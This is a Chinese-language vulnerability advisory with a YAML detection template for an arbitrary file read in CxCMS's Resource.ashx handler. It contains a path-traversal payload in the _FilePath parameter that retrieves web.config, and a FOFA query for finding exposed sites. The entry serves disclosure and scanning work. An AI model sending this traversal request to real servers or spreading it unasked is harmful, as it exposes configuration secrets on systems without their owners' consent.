cxcms-arbitrary-file-read: CxCMS Resource.ashx 任意文件读取漏洞

日期: 2025-09-01 | 影响软件: CxCMS | POC: 已公开

漏洞描述

CxCMS存在任意文件读取,由于/Sys/Handler/Resource.ashx页面 _FilePath参数过滤不严,导致可以读取系统敏感文件。 fofa-query: "Powered by CxCms"

PoC代码[已公开]

id: cxcms-arbitrary-file-read

info:
  name: CxCMS Resource.ashx 任意文件读取漏洞
  author: daffainfo
  severity: high
  verified: true
  description: |
    CxCMS存在任意文件读取,由于/Sys/Handler/Resource.ashx页面 _FilePath参数过滤不严,导致可以读取系统敏感文件。
    fofa-query: "Powered by CxCms"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/CxCMS%20Resource.ashx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md

rules:
  r0:
    request:
      method: GET
      path: /Sys/Handler/Resource.ashx?_FilePath=../../web.config
    expression: response.status == 200 && response.body.bcontains(b'<!--编辑器设置-->')
expression: r0()

相关漏洞推荐